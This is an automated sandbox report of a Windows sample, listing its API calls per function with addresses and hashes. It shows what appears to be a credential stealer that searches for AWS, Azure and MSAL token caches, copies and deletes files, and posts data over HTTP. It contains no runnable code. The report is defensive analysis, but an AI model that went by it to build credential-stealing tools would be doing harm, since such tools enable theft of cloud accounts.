                              • lstrlen.KERNEL32(00425120), ref: 022E4883
                              • lstrlen.KERNEL32(004251C8), ref: 022E488E
                              • lstrlen.KERNEL32(00425270), ref: 022E4899
                              • lstrlen.KERNEL32(00425318), ref: 022E48A4
                              • lstrlen.KERNEL32(004253C0), ref: 022E48AF
                              • lstrlen.KERNEL32(00425468), ref: 022E48C3
                              • lstrlen.KERNEL32(00425510), ref: 022E48CE
                              • lstrlen.KERNEL32(004255B8), ref: 022E48D9
                              • lstrlen.KERNEL32(00425660), ref: 022E48E4
                              • lstrlen.KERNEL32(00425708), ref: 022E48EF
                              • lstrlen.KERNEL32(004257B0), ref: 022E4918
                              • lstrlen.KERNEL32(00425858), ref: 022E4923
                              • lstrlen.KERNEL32(00425920), ref: 022E492E
                              • lstrlen.KERNEL32(004259C8), ref: 022E4939
                              • lstrlen.KERNEL32(00425A70), ref: 022E4944
                              • strlen.MSVCRT ref: 022E4957
                              • lstrlen.KERNEL32(00425B18), ref: 022E497F
                              • lstrlen.KERNEL32(00425BC0), ref: 022E498A
                              • lstrlen.KERNEL32(00425C68), ref: 022E4995
                              • lstrlen.KERNEL32(00425D10), ref: 022E49A0
                              • lstrlen.KERNEL32(00425DB8), ref: 022E49AB
                              • lstrlen.KERNEL32(00425E60), ref: 022E49BB
                              • lstrlen.KERNEL32(00425F08), ref: 022E49C6
                              • lstrlen.KERNEL32(00425FB0), ref: 022E49D1
                              • lstrlen.KERNEL32(00426058), ref: 022E49DC
                              • lstrlen.KERNEL32(00426100), ref: 022E49E7
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022E4A03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                              • String ID:
                              • API String ID: 2127927946-0
                              • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                              • Instruction ID: 009e106bb8a8acf7574a53d722fb4305cb0b4394e5f6b449cadc73ccaecf0422
                              • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                              • Instruction Fuzzy Hash: A341A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                              • strtok_s.MSVCRT ref: 022F0582
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022F05C9
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F05D0
                              • StrStrA.SHLWAPI(00000000,00421618), ref: 022F05EC
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F05FA
                                • Part of subcall function 022F8B47: malloc.MSVCRT ref: 022F8B4F
                                • Part of subcall function 022F8B47: strncpy.MSVCRT ref: 022F8B6A
                              • StrStrA.SHLWAPI(00000000,00421620), ref: 022F0636
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0644
                              • StrStrA.SHLWAPI(00000000,00421628), ref: 022F0680
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F068E
                              • StrStrA.SHLWAPI(00000000,00421630), ref: 022F06CA
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F06DC
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0769
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0781
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0799
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F07B1
                              • lstrcat.KERNEL32(?,0042164C), ref: 022F07C9
                              • lstrcat.KERNEL32(?,00421660), ref: 022F07D8
                              • lstrcat.KERNEL32(?,00421670), ref: 022F07E7
                              • lstrcat.KERNEL32(?,00000000), ref: 022F07FA
                              • lstrcat.KERNEL32(?,00421678), ref: 022F0809
                              • lstrcat.KERNEL32(?,00000000), ref: 022F081C
                              • lstrcat.KERNEL32(?,0042167C), ref: 022F082B
                              • lstrcat.KERNEL32(?,00421680), ref: 022F083A
                              • lstrcat.KERNEL32(?,00000000), ref: 022F084D
                              • lstrcat.KERNEL32(?,00421688), ref: 022F085C
                              • lstrcat.KERNEL32(?,0042168C), ref: 022F086B
                              • lstrcat.KERNEL32(?,00000000), ref: 022F087E
                              • lstrcat.KERNEL32(?,00421698), ref: 022F088D
                              • lstrcat.KERNEL32(?,0042169C), ref: 022F089C
                              • strtok_s.MSVCRT ref: 022F08E0
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F08F5
                              • memset.MSVCRT ref: 022F0944
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                              • String ID:
                              • API String ID: 3689735781-0
                              • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                              • Instruction ID: 00932a0c0d6649626b2fe05d703a4d45960ce4dc3ccbb1e25a9b38d5e34dbdad
                              • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                              • Instruction Fuzzy Hash: 67D15175A60308ABCB44FBE4DD55EEEB77AFF14700F504429E206A6198DF34AA09CF61
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                              • StrCmpCA.SHLWAPI(?,00740FA8), ref: 00405A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00740F28,00000000,?,00709CE0,00000000,?,00421A1C), ref: 00405E71
                              • lstrlenA.KERNEL32(00000000), ref: 00405E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                              • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                              • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                              • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                              • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                              • memcpy.MSVCRT(?), ref: 00405EFE
                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                              • HttpOpenRequestA.WININET(00000000,00740F78,?,00740690,00000000,00000000,00400100,00000000), ref: 00405BF8
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 1406981993-2180234286
                              • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                              • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                              • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                              • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                              • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                              • lstrcatA.KERNEL32(?,00000000,0070F700,00421474,0070F700,00421470,00000000), ref: 0040D208
                              • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                              • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                              • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                              • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                              • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                              • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                              • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                              • lstrlenA.KERNEL32(?), ref: 0040D32A
                              • lstrlenA.KERNEL32(?), ref: 0040D339
                              • memset.MSVCRT ref: 0040D388
                                • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                              • String ID: hp
                              • API String ID: 2775534915-772833819
                              • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                              • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                              • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                              • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED1EA
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022ED32E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022ED335
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED46F
                              • lstrcat.KERNEL32(?,00421478), ref: 022ED47E
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED491
                              • lstrcat.KERNEL32(?,0042147C), ref: 022ED4A0
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED4B3
                              • lstrcat.KERNEL32(?,00421480), ref: 022ED4C2
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED4D5
                              • lstrcat.KERNEL32(?,00421484), ref: 022ED4E4
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED4F7
                              • lstrcat.KERNEL32(?,00421488), ref: 022ED506
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED519
                              • lstrcat.KERNEL32(?,0042148C), ref: 022ED528
                              • lstrcat.KERNEL32(?,00000000), ref: 022ED53B
                              • lstrcat.KERNEL32(?,00421490), ref: 022ED54A
                                • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                              • lstrlen.KERNEL32(?), ref: 022ED591
                              • lstrlen.KERNEL32(?), ref: 022ED5A0
                              • memset.MSVCRT ref: 022ED5EF
                                • Part of subcall function 022FACD7: StrCmpCA.SHLWAPI(0064A350,022EAA0E,?,022EAA0E,0064A350), ref: 022FACF6
                              • DeleteFileA.KERNEL32(00000000), ref: 022ED61B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                              • String ID: hp
                              • API String ID: 1973479514-772833819
                              • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                              • Instruction ID: 41b4746c9ffd5306fe0af26f11e432d7f1e46ce2f38ded2814f4f51be4619bb3
                              • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                              • Instruction Fuzzy Hash: 8FE15175960308ABCB44FBE4DD95DEEB37ABF24301F504169F20AA6194DF34AA09CF61
                              APIs
                              • memset.MSVCRT ref: 00414D87
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                              • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                              • memset.MSVCRT ref: 00414E13
                              • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                              • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                              • memset.MSVCRT ref: 00414E9F
                              • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00740EC8,?,000003E8), ref: 00414A4A
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                              • memset.MSVCRT ref: 00414F2B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                              • API String ID: 4017274736-156832076
                              • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                              • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                              • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                              • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                              APIs
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E5C5F
                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E5C7A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E5DFA
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022E60D8
                              • lstrlen.KERNEL32(00000000), ref: 022E60E9
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 022E60FA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022E6101
                              • lstrlen.KERNEL32(00000000), ref: 022E6116
                              • memcpy.MSVCRT(?,00000000,00000000), ref: 022E612D
                              • lstrlen.KERNEL32(00000000), ref: 022E613F
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E6158
                              • memcpy.MSVCRT(?), ref: 022E6165
                              • lstrlen.KERNEL32(00000000,?,?), ref: 022E6182
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E6196
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022E61B3
                              • InternetCloseHandle.WININET(00000000), ref: 022E6217
                              • InternetCloseHandle.WININET(00000000), ref: 022E6224
                              • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E5E5F
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • InternetCloseHandle.WININET(00000000), ref: 022E622E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                              • String ID:
                              • API String ID: 1703137719-0
                              • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                              • Instruction ID: 296a0ab31cd51e8f10a314ce8ebea061593ea8a90364c4d2e63d94af6b265ca4
                              • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                              • Instruction Fuzzy Hash: 8212DD71970318ABCB55EBE4DD95EEEF37ABF24700F4041A9A20A62194DF742B89CF50
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0073FBC0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                              • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                              • StrStrA.SHLWAPI(?,0073FAD0,00420B52), ref: 0040CAF7
                              • StrStrA.SHLWAPI(00000000,0073FB00), ref: 0040CB1E
                              • StrStrA.SHLWAPI(?,00740448,00000000,?,00421458,00000000,?,00000000,00000000,?,0070F5E0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                              • StrStrA.SHLWAPI(00000000,00740308), ref: 0040CCB9
                                • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0070F6A0), ref: 0040C871
                                • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                              • StrStrA.SHLWAPI(?,00740308,00000000,?,0042145C,00000000,?,00000000,0070F6A0), ref: 0040CD5A
                              • StrStrA.SHLWAPI(00000000,0070F8E0), ref: 0040CD71
                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
